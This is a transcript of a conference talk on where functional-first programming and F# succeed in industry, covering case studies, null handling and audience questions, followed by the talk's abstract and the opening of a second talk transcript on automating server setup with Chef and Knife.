market achieving certain efficiency correctness and complexity goals is the, is the big one. It's all about whether you get the software to market in time to deploy at the right level of quality and efficiency and actually tackling these complex problems for analytical components. So that's the fundamental situation and business problem we're, we're faced with. A key part of drawing out why functional first programming will make a difference in this kind of situation is to focus on why those problems here are actually really severe problems that actually map through to real dollars for businesses. So what happens when you don't get a financial model to market on time? Let's take one of these business situations, an insurance company who has to adjust for example to regulatory changes in the insurance industry and they, let's say they have a current turnaround time of six months from their actuarial department making a change to their model through to the R and Mathematica models that the actuarial department used through to their translation into the C++ code that's actually put onto the deployed system. And with a six month turnaround time then being late to market in that kind of analytical component development would just mean you'll miss entire business opportunities. You just, you simply won't be able to enter the market. And that's a recurring theme for in all of those industries if you can't get a bioinformatics algorithm implemented and out the door in time for your core team in order to, for your bioengineers to assess a particular new product then you just, your entire startup or business may, may, may fail. So it's correctness a problem and again this is very important to thinking in the back of our head why is it the functional first programming applies in particular domains more than others. And in these domains that we were just talking about correctness is absolutely a really big problem. I mean you can get away with an algorithmic trading system that has a few bugs or a few approximations in it if you're lucky but then you might just make that one mistake that actually brings down your entire hedge fund or your entire, your entire trading, your entire trading group because it goes wild with incorrect trades. But on the whole in those kind of components buggy models will lead to incorrect values risk trades which will correlate through to full on exact you know dollar loss in your, in your, in your, in your systems. If you have buggy services then you might incur reputation loss and if you have buggy products then you'll get all, then you'll get lost, lost customers. Is efficiency a problem? Absolutely. In these trading in, in, in finance and trading settings they have a 13 hour window frequently have a 13 hour window overnight where they have to value the bank and if they can't get the numbers on the desk by the next morning within that 13 hour window then you know that is a hard limit. They have to have it there or else the, the, the, the, the operate, the bank can't actually run its, its operation and they're operating without update valuations and risks. Efficiency in services and, and, and products is, leads to again the obvious examples of not being able to scale out your services or slower products. But perhaps the most interesting theme that runs through case studies where functional first programming is, is effective is the question of complexity. And so I think it's a question that we don't talk about enough in software is like what is this, what's the software that we weren't actually able to implement? Okay. What? If you, if, if you're in a, in a, in a, in a trading situation and you simply can't implement the software to model the financial products that are being traded, then you're, then you effectively can't participate in, in, in, in certain markets. You're just unable to be a competent player in, in, in, in, in, in, in certain domains. The same goes with all of the previous domains of work that I, that I was, that, where, where we talked about the various situations. If you can't do your bioinformatics algorithms then in, in, in time or you simply can't model or implement them at all, then you would just get failed project after failed project. Okay. So, is complexity a problem? In these situations, complexity is absolutely a fundamental problem as is correctness, efficiency, and timeliness in, in, in, in, in delivery. So that's the recurring business problems and they are severe problems that lie at the heart of software delivery in these kind of domains. Yeah. One of the big recurring business problem that I see is wrong product. Yeah. Does that feed you into? I don't, I don't think so. There's all sorts of things where improved programming techniques don't, don't help. Okay. And I think this part of this is trying to be clear about what better programming helps with and what it doesn't help with. And, and I, and I come to an important part of that in, in, in just, just, just a moment. I, I talk about it now. So complexity, tackling complexity is crucial in the kind of domains I've talked about so far. And that happens to be the domains where functional first programming is, is particularly effective. But in user interface work, it's very, the, the situation is extremely different. It's, it's interesting in two ways. One is which asynchronous programming is hard to get right in user interface programming. And you see these functional asynchronous programming techniques that we now see in C-sharp and F-sharp and going right through the industry are, are critical for, for, for tackling that part of the complexity of user interfaces. But on the whole, user interfaces are about making, making things, you have to make a simple thing, not a complex thing. There's just no point in being able to implement really complex user interfaces, right? Nobody wants it. It's wrong, okay? And that's why functional programming isn't culturally in some sense a good, it's, it's perfectly good implementation tool. You can do wonderful asynchronous programming. You can, you can, but it, you know, but on the whole, it's a design problem, which is sort of what you say, wrong product. You have to make simple things. Yeah. Yeah. Well, there's, there's, there's, there's another aspect here which you could fold into this kind of discussion and, and which, which is about time to failure and investigation of, of, of problems. You want a faster time to explore, to, to, to fail when exploring the design space. And I, I think, again, functional first programming has a key role in getting, you know, finding out that you're doing the wrong thing sooner. Okay. But that's a slightly harder. And I wouldn't, I wouldn't say that I have data to back that up. People don't say, occasionally you get people saying, yeah, we discovered failure is faster, but on the whole people don't talk about that. But I think you could draw that out much more as, as a theme. Yeah. Okay. So the need in these kind of domains is analytical programmers delivering correct efficient components in the enterprise on time. Okay. That, this core is what F-sharp is about as a programming language. And, and, but I'm, I'm not just talking about F-sharp here, although, I mean, it's obviously focused around my experience with F-sharp. But functional first programming is really about addressing that set of needs. It's one set of problems that functional first programming helps solve. And the question is why? And really when it comes down to it, at the core of every functional first language is just a fabulous problem-solving, set of problem-solving tools. Okay. Simple, correct code for complex problems. You can just churn out correct analyses and correct manipulations of data very, very rapidly in these, in these, the Haskell, Scala, F-sharp, OCaml, Erlang, to some extent, a kind of programming environments. They're just really wonderful tools for getting things, for doing correct manipulations and solving software problems. A key aspect on this time-to-market side of things is interoperability. And I hadn't appreciated just how important this was as a reason for, in particular for these interoperable functional languages, F-sharp and Scala for being so successful. F-sharp is an odd language because you can adopt it for just one part of a larger solution. Okay. You can have really 20 of your projects being C-sharp projects and just one or two being F-sharp projects. We see that and you'll see that in some of the case studies that many people start their F-sharp adoption that way. Some people, some people liked it to ask me, how can we get started? How can we get our enterprise to adopt F-sharp? And I say it's easier. You just go right-click, add project, F-sharp. Right? It's not that hard. And you just get, and then ask forgiveness later. So, but because you can develop these components in a way that just can integrate directly into these larger C-sharp solutions, your functional code is just part of the larger solution. And in particular, what that means is in these kind of shops where you have some kind of analytical software development going on, perhaps in R, perhaps in Mathematica, perhaps in Python, perhaps in some other system, then often these shops have a translation stage where the analysts work in these systems and then that code has to be put over to the IT shop and re-implemented in C-sharp and C++. And honestly, that process can be six months long, not only that, but in the case of one shop we know of which translates Mathematica to C++, they do it in a way that uses this macro-wise kind of C++ in order to make sure the semantic stays the same. And then the C++ ends up doing deep copy and cloning of every object almost at every step of the way and actually ends up not particularly efficient as a result. And so you're not even getting the real benefits of the deployment in C++ in this environment, but you honestly, you can just eliminate six months from your software development process in some of these key analytical departments of a business by moving to an environment like F-sharp. And it's very hard to eliminate six months out of a software development delivery pipeline any other way. That's just savings of that magnitude are just extremely hard to engineer. A key thing from my perspective, I'm a big fan of these strongly typed functional programming languages, the F-sharp, so to some extent sort of the C-sharp functional programming subset as well, because these are strongly typed and we get great unboxed representations of integers and numbers, we can get.NET generics all the way down, and that lets us maintain efficiency in this analytical code in an absolutely key way, and you get performance equivalent to C-sharp and Java and sometimes C++, so we love that. And then this key thing about, they help analytical programmers tackle more complex problems, so that's the need being met by this class of programming language. The functional first programming helps through simple correct robust code, interoperability eliminates entire phases from the software development process, strong typing gives efficiency or can help enable efficiency, and above all empowering analytical developers to solve more complex problems. So let's take a look at some of the case studies where we've seen this actually work in practice, and what I've done here is taken some of the testimonials that are available on the F-sharp software foundation pages here. So if you come over here, this is f-sharp.org here, and there's a wonderful set of testimonials provided by people as this whole range of them down here, which you're welcome to take a look at. And these, and there are permalinks here if you want to send them around to people in your communities. So this first one, so I've taken those testimonials, some of them, and just brought out where they're pulling out these common themes. So this is a power company in the United Kingdom, and they use F-sharp for a calculation engine to help decide when the power station's come up and down. So this application is taking a set of input feeds from the energy market around Europe, and there's a lot of data engineering and manipulation around the ages. It used to be that Finland, for example, every country has to publish the amount of energy going in and out of the national boundaries, and it used to be, for instance, that Finland only published those as a bitmap, a GIF, and they had to do optical character recognition on the GIF in order to read those off, and that's changed now. Supposedly they published an XML feed or something now, but that's fine. But the market signals aren't coming in that rapidly, but you have to still write very accurate analytical code to make a decision to react to those market signals in order to change the decision about whether you're going to spin up a power station or not on the expectation that there's going to be a need for it in a particular country. And so F-sharp is key to that implementation. So the people who did this implementation brought out a deeper analysis of what was it about F-sharp that technically helped them into operation units of measure in helping to make correct code, exploratory programming with F-sharp interactive, drawing out the link between functional programming and unit testing, no complex time-dependent interactions to mess things up, parallelism, code reduction, and a lack of bugs. But when you look, think back, how does that map onto those four big themes? That's really about interoperation, is time to market and deployment. Units of measure is correctness, exploratory programming is just time to market or time to deployment or time to fail in that sense. Paralysis is about efficiency, et cetera, and correctness is about, so lack of bugs is of course about correctness. So it's those four big themes that fit continually with these. You look at case studies in finance, these are two older case studies, one from Grage Assurance and one from a major European anonymous finance firm who've got over a hundred, a major core component group developing all their financial models in F-sharp. And again, time to market and correctness and efficiency are the things that come out. F-sharp and insurance, a large actuarial company, they're using F-sharp for core actuarial components, quickly create a system which will perform the calculations highly efficiently and parallel with the perfect match to the spreadsheet results. And again, it's just those themes, time to market efficiency, correctness. The trading platform, this is done by a company called Treyport, making use of asynchronous programming heavily and time, again, another way of saying that it tackles complex problems experience, F-sharp developers regularly solve problems in days that would take weeks for using more traditional languages to solve and complex problems in an elegant and highly maintainable manner. So, maintainability, complexity, time to market. It's not just about F-sharp, the other people adopting these functional first languages have reported extremely good results as well. OCaml, this is some slides based on a 2006 talk, quite an old talk now, but from a company called Jane Street using OCaml, language heavily strongly related to F-sharp, and they brought out this thing, robust performance of readability. Now it's interesting looking at this thing, they say that the way they write this up, yeah, they say the performance is better and better modularity, new systems implement strategies more complex than previously possible. I think that's an interesting point where I kind of wish they had gone that one extra step forward to explain why being able to implement more complex strategies actually made them money, because it's not necessarily the case. You don't want people just sitting around making, hey, I got to implement a more complex user interface than I ever could before, isn't that great? You want those people to just leave your company as fast as possible. But in this kind of setting, in a finance setting, that's just completely different. Implementing complex things is fundamental to the modern financial industry, for better or for worse, but that's how financial software is these days. F-sharp in biotech, similar kind of area, F-sharp ROX, building algorithms to DNA processing, it's like a drug, et cetera, it's a great comparison, great comparison about Python. Python is a great language, achieves many of the goals set out here, but the actual F-sharp code is 20 to 100 times faster to run and faster to develop. So in units of measure we see efficiency, correctness, faster to develop, times of deployment. F-sharp and advertisement and ranking and rating at Microsoft, again rapid development of prototypes, of code. Again, it's an interesting thing that we use this engine to simulate the auctions done on, so when we show advertising on the right hand side of Bing's results, for example, there's an auction is run behind the seams, a second price auction. And a key thing is to make sure you can't game the system, okay, by putting lots of extra fake agents into the system, for example, or by collecting information where other people, you know, that other people may not have access to, could certain players kind of, yeah, effectively game the system so nobody else, so they get better prices than everybody else. Yeah, it's quite complex to do those computations and simulations. And again, a key place where F-sharp actually gives good, excellent results in core components. A more recent case study is F-sharp at Kaggle. Kaggle is a bit of an iconic data science company. They run competitions for data scientists. It's crowdsourcing of data science. You can put your data sets up there as a company and put a sample of the data set up and invite people to try and do a particular analysis or prediction algorithm on the data set and then you get to take their algorithm and you put a bounty up saying the person who gets the best algorithm will get a certain amount of money and then those algorithms can be run over larger data sets. It's really very, very interesting business model and internally at Kaggle they use F-sharp for their core data analysis algorithms and the same sort of things come out about correctness of code and then moving more and more of their code to F-sharp. Okay, so from what I see, the data sort of agrees that the places where F-sharp is particularly successful is where simple correct robust code, interoperability, strong typing and solving more complex problems as the common themes. Right, just to give you an alternative view, this is satire so it's actually not an alternative view. It just looks like one. Ten reasons not to use a statically typed functional programming language. This is, I don't want to follow the latest fad, etc. I get paid by the line. I showed some of this this morning for those who are already there so if you prefer to program like this because you're paid by the line then that's just fine. I bet you might prefer to kind of do this kind of thing but if you get paid by the line then you're not going to like statically typed functional programming. I love me some curly braces. Okay, then if you're addicted to the curly braces then it's not going to be your sort of thing. I like to see explicit types. That's fine. If you prefer this kind of thing in your C-sharp or Java's then that's fine. If you prefer sort of declarative approaches where the type is all getting third like an F-sharp then that's, then you're rather, I like to fix bugs. Okay, yeah. That's it. Nothing quite like the thrill of the hunt finding and killing a nasty bug. And if the bug is in the production system even better because I'll be a hero as well. Okay, that's what you want. And I know I've been there. I've gone down implementing in the.NET runtime and finding those bugs in the C++ code. Okay, I live in the debugger. I don't want to think about every little detail. There is something about these strongly typed functional programming languages that actually make you cover cases, make you cover edge cases in your code. Pattern matching as a construct in particular in these languages just means that as you take a financial model in and you write an algorithm over it, you have to cover all the cases of the code or the code will give you a warning or it won't compile. And that's at the core of why functional, strongly typed functional code ends up more correct. I like to check for nulls. I'm very conscious about checking for nulls and every method gives me great satisfaction to know that my code is completely bulletproof as a result. Okay, haha, just kidding. Of course I don't actually do that everywhere. Okay, design patterns. These strongly typed functional languages tend to be, they do use design patterns but they de-emphasize them in comparison to the object oriented languages. And that is sometimes hard for people to get used to that we don't talk in terms of strategy, abstract, factory, decorator, proxy. That sort of language just tends to get thrown out. Big picture design patterns do stay around like the sort of NVVM kind of models, design patterns and the like. And then people say they say it's too mathematical but that's actually a cultural problem in the functional programming community, functional first programming community. So I would actually agree with that that we use, we have to change the culture of functional first programming because it's not actually hard at all. Okay, we should have a little private chat about nulls I think. You know, the evil that is nulls in the programming languages that are most common in the industry today is absolutely awful. Okay, how you can have data structures where at every point of the way the data might not be there. How you can reliably write code where you have to compensate at every single object, every single list cell in a linked list, every single place in your code, your data might not be there. I mean imagine taking this talk and then just like randomly replaying thousands of variations where words get deleted out of nowhere and then you still have to kind of interpret and cope with all these different possibilities. It's so, so pernicious and so ridiculous that I would honestly say that the number one reason for moving to a language like F sharp or to languages that were nulls and not the default is because of that. So the gains you get from not having to think about null as a routine part of your programming is absolutely enormous. And I just do not see a way forward for the existing languages in industry in C-sharps or Java or other languages. Maybe I'm wrong and someone will find a way forward for those languages where we can get to a non-nullness being the default but it's really looking bad from that I'd say. So we honestly just moving to a language where null is not the default is just enables people to do so much more productive, such more productive things with their time than worrying about sort of the absence of random objects along the way. Okay. So that's the common themes for why functional first programming is effective in practice, in industry and where it's effective. Just a mapping those through to where we have rolled out, where we've been aiming with F sharp, especially from the Microsoft perspective of F sharp. I'll talk about that a bit more but this should be seen as sort of visual F sharp, visual F sharp's focus. Visual F sharp 1.0 and 2.0 is focusing on sort of this middle part code analysis and algorithms, visual F sharp 3.0 through the type provider feature which I talked about this morning was focusing on data information and services. Okay. On the presentation UI and design side there are actually some great F sharp based solutions. This web sharper compiling F sharp code down to HTML5 is a great way of doing UI but on the whole we have at for the Microsoft anyway we focus less on the user interface side of things for the reasons I've explained about so far. Some other ad hoc lessons from industry, so much of the work that you know as end users of F sharp that you really need to do is to work out how to combine it with existing components and there's a lot of variations. You might for instance have to combine F sharp on the server side with an Oracle database on the back end and you might be using a C sharp front end silver light that's a trading company. The trading platform is used silver light as its trading front end. You might have to take F sharp and combine the C plus components. You might have to take F sharp and a GPU framework for example. You might have to take F sharp and have it working with Hadoop and service stack for example but again it's combining these technologies is a key part to being successful and not necessarily expecting there to be an F sharp sort of specific version of each of these technologies but learning how to make F sharp work in conjunction with these other technologies is a huge part of what it takes to adopt it successfully. It takes a surprising amount of time to build capabilities in functional first techniques. I mean it's like some anecdotes for people adopting F sharp. Some people say yeah we're a team of two F sharp programmers in a larger.NET team. One guy's job is to implement everything in F sharp. The other guy's job is just to delete the C sharp code that the other people write. I've honestly heard that. Another one is offshore teams versus onshore teams. That's a really interesting thing when you look at it from the first world perspective. The first world is having a major kind of competitive problem with like sort of outsourced industries in the developing world providing good software delivery and as industries, as physical industries, manufacturing industries know the key way to stay competitive is better tooling. That's obviously the German for example or industrial base of real manufactured goods know that the key way to stay competitive in the modern world is through better tooling. We actually see first world programming teams adopting F sharp in order to be able to stay competitive against much larger teams of programmers in the developing world. Some of the statistics that have come through from that are quite amazing. You get like functionally equivalent systems or ones where the F sharp system has more functionality and the F sharp system is 7,000 lines of code and the C sharp system coming from the outsource group was 200,000 lines of C sharp code. So a factor of like 25 difference in the end result. There's a couple of factors that play there. One is the programming language and one is the different kinds of programming teams and different kinds of cultures in the implementation. But it just shows you that you can take very different approaches to software implementation and that can map through from the language and tooling you're using. The building capabilities in functional first techniques definitely takes time. Training is totally key. People typically adopt by trialing on specific components, prototyping and testing and exploration and just using that one F sharp project and then extending out from that point. I've seen people fail with F sharp because they've tried to rewrite entire systems in it even though they're stable and working and that's just crazy. And also fail because they don't reuse C++ high performance components and they try to rewrite everything in managed code. That's a good system failure in the C sharp world for the same reasons. I'm certainly not saying these lessons are in any way unique to F sharp. This is just bread and butter for many kinds of software adoption and adopting new tools. But for some reason people can just forget that they need to do these things. A little bit about what's going on with F sharp more broadly. Just check the time. We have plenty of time. So I'll probably wrap up a little bit early just to give you a taste. I mentioned this this morning. It's really important to make this distinction between the visual F sharp tools which are part of Visual Studio and compared to F sharp as a language. F sharp as a language is open source and cross platform. And in many ways you don't even need to approach F sharp as a language through any Microsoft kind of perspective at all. And that comes through in this F sharp.org here if you are the F sharp software foundation. If you would like to use F sharp on Mac or Linux or Android or iPhone or HTML5 or Free BSD, this is the place to find out about that. So it's and this is all the mission statement of the F sharp software foundation is very interesting. They're quite happy for Microsoft to be the main contributors to the language and do the tooling on Windows. Because Microsoft do that extremely well on Windows. And they see their job as about promoting and protecting F sharp generally and to take F sharp onto all these different platforms and offer all sorts of different tooling. You can get IntelliSense, F sharp in Emacs for example. You get autocomplete while using Emacs using the tooling that's provided through the F sharp software foundation. If you want to run on Android and iPhone and iPad you can use the Xamarin tooling. And if you want to find out how to use F sharp with Amazon for example you can find that out with the cloud programming under here and so on. And if you want to be a part of the F sharp software foundation you can just join up either as a founding member. They're just starting some working groups in different areas. And if you want to contribute to this website you can just join in to send a pull request to the website on GitHub and they can integrate it very quickly. So you can, there's a great place to participate in the community and the organization. Now that's F sharp org. So I think that's changing perspectives. F sharp certainly grew up as being sort of for Windows. And so now F sharp runs on many platforms. And I think a new kind of thinking where it used to be that I think Microsoft can sometimes play the role of sort of being the popes in a way or being like the popes in the cardinals and people wait for the puff of smoke to come and from Microsoft and say well there's a new version of Visual Studio coming out. I wonder what's in it. And that's, we're kind of changing that to be, it's much more about Microsoft contributing to F sharp. And lots of other people contribute as well. So we see Xamarin for instance giving support for F sharp on iPhone and Android and lots of other community and startup groups contributing as well. So we see now that F sharp doesn't just have Visual Studio as its IDE but you can use Xamarin Studio, you can use Mono develop and you can use Emacs and Vimal and all sorts of other tooling as well. And so this is a bit of a tour of what's going on in F sharp. That's not to do with Visual Studio. So there's a great sort of set of tooling which is taking the F sharp implementation and hosting it. It's actually taking the F sharp type provider mechanism which allows you to interoperate with all sorts of things and exploiting that to place F sharp alongside interesting application context. So F sharp hosted alongside Excel and with very nice interop between the two. There's F sharp hosted as a scripting language for a 3D CAD system which is a lot like AutoCAD called Rhino. There's using it for data analytics or for web or for Hadoop and data analysis applications. So very interesting and it's there. There's this tool called WebSharper which allows you to do full HTML5, it compiles F sharp down to JavaScript, full HTML5 development using F sharp. It uses a type provider model to access through to the type script, strongly type views of JavaScript components. And this slide is provided by Intellifactory and is just summarizing some of their experiences with that tool. There's also another community component, open source component to compile F sharp to JavaScript and again uses a type provider for TypeScript files, TypeScript header files for interop. There's the people who do WebSharper have got an online development environment called CloudSharper which is an F sharp development environment in the cloud. Again this slide is provided by Intellifactory and some other developments at Microsoft is F sharp 3.0 which is the features I talked about this morning. We've been working on helping to show how F sharp can be used with Azure for scalable service programming. We've done some currently experimental work with F sharp and Hadoop for big data programming and there's some interesting components of Microsoft called Cloud Numerics for scalable math programming which you can get in there in lab status at Microsoft. And I've talked about some of these things. There's some other frameworks one called Embrace and this is work done by the community, some of which I've talked about already. Okay, I'll skip this part here. Okay, and I'll wrap up by saying functional first value languages deliver real value in particular areas. We see that again and again in the case studies. And the key things are reduced time to market, correct, rapid, correct development, efficient execution and solving complex problems accurately with maintainable code. And from the F sharp perspective, you can certainly use it to succeed in functional first programming in industry today. It's open source, cross platform, strongly typed and supported and there's lots of interesting work going on in applying it in web and data and cloud arenas. And learn more at fsharp.org and I would love to take questions and I've finished a little early and so once we're over, go and have a coffee. Okay, yeah. So what is the alternative to using nulls like that? You talked about not having to use nulls. Oh, so in F sharp, when you define a type, you can't use null with that type by default, okay. You can put some annotations on that allow you to use null and if the type comes from.NET libraries, you can use null. Okay, that means when you, for instance, if you have an object coming in as a parameter to an F sharp function and it's got an F sharp type, then you know it's not null. You don't have to check for null. Okay, you know a value is not null and that's normal in languages like OCaml and F sharp. You just don't have null at all, okay, in some of those languages. And so some things, there's a whole set of decisions. You need design decisions very carefully made in F sharp all the way through to support the fact that things are, you don't need null. Okay, there's a couple of places where you might need null when initializing arrays, for example, they might initially be null and so there's some backdoors for creating an array with undefined values and then populating them as necessary. But in routine F sharp programming, values just type simply don't have null as a legitimate value or a normal value. So, yeah. Oh, so, yeah, so if you need an absence of data, then you use what's called an option type in F sharp, where it's, you know, if you have a string but it may not be there, so you use an option, okay, and that means when you use that string, you actually have to check first if it's none, then do something and if it's there, some, if there's something there, then do something else. But you actually have to put those explicit cases into your code and that means you will, you know, you actually have to think a little bit more about like what happens if it's not, if the data's not there, if the data's not ready, if the response hasn't come back, if the component isn't initialized yet or something like that. So you have to cope with those cases and that's what makes your code more robust is be able to do those cases explicitly. Yeah. Do you compare F sharp and O camel? I mean, I haven't got a slide particularly comparing those two, so, broadly speaking, F sharp is, they're different at the language level for how they do objects, for instance, F sharp has a dot net object system in it, O camel has a very interesting object system on its own. It's certainly different in interoperability characteristics. I've got a very similar core language in its core problem solving capabilities. F sharp has things like asynchronous programming. O camel has its own version of asynchronous programming. But I think the key difference for certainly this audience is F sharp runs on top of the dot net stack and just gets all the interoperability and VM characteristics that you get from that. But O camel is a great language that's used for, I wouldn't say, yeah. But I mean, for anyone interested in dot net programming, F sharp would be the place to start. Yeah, John. I've learned a huge amount about software and programming languages through doing F sharp. And yes, there would be things I would definitely do differently. Through type providers, I mean, type providers is a very interesting mechanism because you've seen the examples where we interoperate through to other programming languages with type providers. And I would actually probably design F sharp to be a little further away from dot net and it just happens through one instantiation of it would be to interoperate with dot net. Okay. And so we would actually probably access the dot net libraries through the type provider mechanism, for example. So that's one area. I think the, there's a couple of places where I think we've got, F sharp both has records and class types. Okay. And I think we would bring those still further together, closer together. And I would actually think we may try and get that done in a future release of F sharp at some point, just keep bringing those concepts, simplifying and reducing the number of concepts in the language. There's, some of the complexity in the language has sort of flowed in from the outside. It's very, very tricky to get the balance right. So take for instance F sharp doesn't support partial classes. It doesn't really fit well with the model in F sharp. But it's an example where if we had done it, we'd have a more complex language which would be less satisfying, but we'd be able to interoperate just a little bit more with the dot net world. And I'm kind of glad we haven't done it, but we almost got forced to do it. So there's a lot of those edgy kind of decisions we've had like, and yeah, we probably got the call right on 95%, 98% of those. There's some cases where there's corner, if you look through the F sharp, F sharp is a very simple language in its core use. Okay. But there's edge cases about delegates or structs or dot net things which are kind of leaking around the edges, which you don't notice for most of your programming. But it's, I think, yeah, that we might have let a couple too many of those things come into the F sharp language properly. But that's okay. It's not a big problem. Yeah. Yeah. John. Yeah. Yeah. Yeah. Yeah. Yeah. Yeah. Yeah. Absolutely. The, the, not all, certainly not all financial software has to be correct. I do think the academic community, which both you and I have come from, do over, overrate correctness on the whole. But the, I mean, there are many, many kinds of software which are not covered by one of the situations I've talked about today, which tend to correspond to the ones where correctness does matter in terms of getting correct code delivered or getting in the time to market sense of correctness, meeting your requirements sense. And I do think those kind of correspond a little bit to the parts where functional programming isn't quite so effective in achieving goals. But yeah, I personally think that the, there's a strong correlation between where correctness is important and where, and where functional first, strong-to-type functional first programming is, is effective in practice. But yes, I agree with you. There are whole parts of the software industry where correctness is not as important as academics might think, but probably more important than practitioners might think. Okay. So, yeah. Yeah. Yeah, I think we're still, so the, the, the question was relative to C-Sharp, F-Sharp doesn't have great refactoring support and advanced tooling support in Visual Studio. And people coming from C-Sharp noticed that. F-Sharp is, is in a sense up against an extremely hard competitor on the straight coding front with C-Sharp because its tooling is just absolutely fantastic, especially when you put in something like resharp into the mix as well. Whereas if you compare F-Sharp, say, to OCaml or some of these other languages, its tooling is absolutely, you know, I mean, I think its, its fantastic. So, so what are we going to do about that at Microsoft? I mean, I, I would love to open that up much more to the community to allow many more contributors to F-Sharp tooling. I don't know. It's concretely, it's hard to make that happen because Visual Studio has to be done to a very high level of quality and we can't just, you know, allow arbitrary new stuff into the mix. So, yeah, I would love to, love to open that up much more to allow many more contributors to do interesting things with F-Sharp refactoring and, and tooling. We, it's, it's going to take us time to get there and to work out how to do that and what gets done in the core Visual Studio, Visual F-Sharp team and what gets done on the outside. Yeah, we've, we've, we've got a good balance with the community on just about everything else but that one is, we, we're, we still need to work on. The, the, the one good thing that comes from having a relatively minimal in comparison to C-Sharp level of tooling is that as you move to the other development environments like Xamarin Studio or Monodevelop or onto the Web Cloud Sharper kind of thing, they're also a similar development experience. So even though things are a little bit more minimal, at least they're uniform across all these different environments and, you know, there can be something a little bit addictive about kind of having a development environment that does absolutely everything for you and then you feel, but then when you're F-Sharp, you feel like you can move into different settings without, you know, without really feeling like you're missing all those crutches, if, if it were, yeah. The point you made just coming on from the community to produce that, what made about F-Sharp and the functional community being a bit academic, a bit mathematical? What can we do about it? Oh, I just ignore it. I mean, I just ignore that, that, that side of things I find sometimes it's a matter of language. I mean, we have this feature called asynchronous workflows in F-Sharp and that's a great name for it and there are mathematical names for those, for that kind of feature and we just, you just, you just choose, yeah, just, just, this stuff is not, is not mathematical. It's a straight, this is code. It's a simple, straight code that anyone can understand. I mean, I, you, you show F-Sharp code to a, to a 10-year-old or a 15-year-old. It's just entirely natural to them and it's not until we get our minds totally infected by some other programming language that people start to find it hard. Okay? Yeah. I think it's also in terms of the, the community is obviously structured, has been structured around where it's come from. Yeah. Yeah. But we, that's really de-emphasized in F-Sharp. The F-Sharp community is very practically minded. So, yeah. I mean, we just, yeah, we just remain very practical, very focused. Yeah. Yeah. One, I think, last question. How are we doing for time? Yeah. Yeah. I, I mean, that, that, there's Marcus on the, that's the, that's the, that's the thing. I mean, that, that, there's Microsoft's view on F-Sharp, okay, which is about mainly for data and coding, code-oriented activities, which are mostly server-side or portable activities, okay. So, you can use portable components and use them on Windows 8 phone, for example. But not user interface. The Microsoft's view on F-Sharp is not focused on user interface work, which is why you don't see it on all these client-side platforms like Windows 8 or Windows 8. So, yeah.
|
Functional-first programming is now a standard technique in the software industry. But what does it mean to succeed with functional-first programming in real business situations? What sort of business problems is it applicable to, and why do those problems matter? What sort of benefits can you expect if you adopt functional-first programming? How do the business needs map through to features of languages such as F#? In this talk, we’ll take a fun walkthrough case studies, observations, anecdotes and hard-nosed revenue figures to answer these questions.
|
10.5446/51414 (DOI)
|
I guess I have to do this in English. Okay, so my name is Eiling. I'll talk to you about Chef. How many of you know what Chef is? So, almost everyone. How many of you have used it or played with it? Not so many. So, few of you. So, I'll tell you a bit about myself just to set the stage. So, I used to be a more or less full-time consultant developer. But then I decided to do a start-up. So, I'm still a full-time developer, but I'm also now a full-time salesperson and the ops guy and everything. So, running software as a service is just me and another guy. So, we have to maintain this and run this ourselves. So, at the moment we have four servers, one of each kind. The thing is when running stuff on Amazon, the servers, they might just disappear one day. So, you have to run into one of the third servers like six months ago and just like stop working. And then you have to get it back up. So, you could have had some kind of snapshot, but that might have been with data in some kind of weird state. Or you could have then installed everything manually on a fresh image, but then you have to remember how to do that. So, it takes some time. Most likely you would get it wrong. So, at least in a stressful situation, that can be difficult. And also, as our business grows, we hope to scale out and add redundancy. So, then it's nice to have like a couple of each type of server, maybe. So, it's kind of that need to be able to quickly recreate anything if something happens. And also to be able to scale out or something. I wanted to have this automated and kind of make sure that it gets up again in the same state every time. So, I had to find something I could do this. So, previously I worked with some guys who used Puppet. I guess my challenge with Puppet is I read this book called Pulling Strings with Puppet. And it was all this stuff about how to circumvent the weird object model they made. So, maybe they've changed that, but at some point it was very Ruby-like syntax, but it was not Ruby. So, it's like you have to learn a new language that looks like another language. It was a bit confusing. It was just pure Ruby, and I already knew Ruby, so it seemed like a better fit to me. So, there's obviously different ways to run Chef. There's the hosted option. You can also install the hosted server in your own cloud. So, the hosted option sort of provides you with a server that keeps the states and all the recipes and all the data that the different nodes will pull down. There is also an open source version, which is not as flexible. You have to, I think, if I understand it correctly, you have to sort of run the server on each node. And also there's this new thing called Amazon Ops Works, which allows you to use the Chef recipes, but it's not necessarily the exact same thing. So, I'll touch a bit more on that, and there's probably a few other things as well. So, I went for the hosted Chef option. There's this company called Ops Code, which allows you to, where you can create an account, and you get the central, like, Chef server. It's free for up to five nodes, so it's kind of easy to get started with. So, to get started, basically, what you typically do is you go to this kind of template, boilerplate, GitHub repo. I don't know if you can see this, maybe I should make it bigger. And you clone the repository. So, you would typically just go here and clone it. And you would end up with a folder structure, just like a few empty folders. And then you have to set it up so you can use this command line tool, which is called Knife. So, a Chef uses a knife. So, what you start doing, I'm going to show you my repository I'm using. So, you have this Knife file, which just sets up some paths and some basic config, which you download from Ops Code. And you download a few certificates, which allows you to talk to the server, and also, which I used when the clients or the nodes registered with the server. So, you set that up, and then you have a kind of a command line tool, which is called Knife, which you can give various commands. So, for example, you can run Knife node list, and it will list all the nodes. It will query the server and get back the nodes. So, you can see the same four servers here as I run on Amazon. There's a lot of commands, which you can use. So, you can create users, tags, roles, nodes, environments. You can SSH into the servers. I'll try to demo some of this. But the kind of the central concept is a cookbook. So, a cookbook tells you how to install some kind of service or package on your servers. These cookbooks, there are a lot of them out there in the wild. So, there are some that are more or less what they call like community cookbooks, which are kind of a more or less endorsed by ops code. There's also a lot of people just making their own cookbooks. So, if you need to install, let's see if I can show you this. So, if you need to install a service, anything really, it might be that the cookbook is already out there. So, you have stuff for installing various databases, servers, monitoring applications, different languages, everything. And there's several ways to install or select these cookbooks. A typical way is to do a knife cookbook install, and then it will download the cookbook from GitHub and do some kind of GitHub magic so it will make a branch and a tag or something and just kind of add the cookbook to your repository. So, that's what I started out with. But it became quite messy because it didn't sort of check the cookbooks into the repository. So, it was very tempting if I wanted to change something to just go directly into the cookbook and change the code. But then, when I commit that to my three and then if there's an update to that cookbook, it's kind of a merge conflict, which is, it can be quite painful to solve. So, I found this tool called Librarianchef, which basically allows you to just specify the cookbooks in a cheff file. So, when I, if I then run Librarianchef install, it will download the cookbooks into a folder, but it will clear them out each time so that you don't check it into the repository. You just kind of copy it locally and you add it to the githing or file so it's not committed. So, that sort of prevents you from just going in there and hacking, which is kind of neat. Obviously, sometimes you want to create your own cookbooks as well, so you can still do that, keep them in a separate folder. I thought I'd show you some, just a basic, so a cookbook. So, 